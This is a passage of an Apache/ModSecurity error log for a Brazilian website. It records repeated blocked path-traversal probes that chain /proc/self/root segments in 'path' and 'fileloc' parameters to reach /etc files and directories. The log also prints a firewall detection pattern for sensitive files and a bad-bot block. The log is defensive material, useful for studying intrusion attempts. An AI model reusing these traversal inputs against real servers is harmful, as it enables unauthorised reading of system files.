"abuT2v-YZRR_7pZ7nDJOxAAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:12:50.379082 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:51204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuT4hkFeYa1D6dYQnCt7QAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:12:51.789783 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58170] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:12:57.070267 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:51220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuT6da6ubjKNq_cu4b-FgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:13:03.055610 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.241.31:34582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuT7_-YZRR_7pZ7nDJOzQAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:13:13.115316 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:33012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuT-QkwaGbbGflqUZB0RQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:13:15.125795 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:13:22.909899 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:47002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUAvu8EFLIOrSqIptenAAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:13:33.910543 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:60680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUDda6ubjKNq_cu4b-KgAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:13:39.761812 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59426] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:13:49.499378 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.241.31:37712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUHV_V7PWP6ixUYl59XAAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:13:56.881702 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.228.61:34342] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuUJOyqAr6etmhZHNoltgAAAEA"]
[Thu Mar 19 03:14:02.038053 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60042] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:14:06.585381 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:40856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuULQkwaGbbGflqUZB0ZQAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:14:21.166972 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:45902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUPeoXxyEfFpUF8f_TRgAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:14:25.045827 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:14:33.766868 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:45316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUSQbLMZ6AikZjR9UejAAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:14:44.044276 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:39962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUVOoXxyEfFpUF8f_TSwAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:14:48.129805 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:32896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:14:52.939529 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:35364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUXAkwaGbbGflqUZB0cwAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:14:58.723432 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:42858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUYuyqAr6etmhZHNol2QAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:03.421678 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:42868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUZwkwaGbbGflqUZB0egAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:07.899477 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:50552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUa_u8EFLIOrSqIpte6wAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:15:11.562997 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.241.31:50564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUbxkFeYa1D6dYQnCuIwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:15:12.257826 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:15:16.217209 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.241.31:50576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUc1_V7PWP6ixUYl59iQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:18.587111 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:55580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUdvu8EFLIOrSqIpte9QAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:20.198272 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.241.31:55586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUeBkFeYa1D6dYQnCuJgAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:15:23.748392 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:55598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuUegkwaGbbGflqUZB0gAAAAME"], referer: 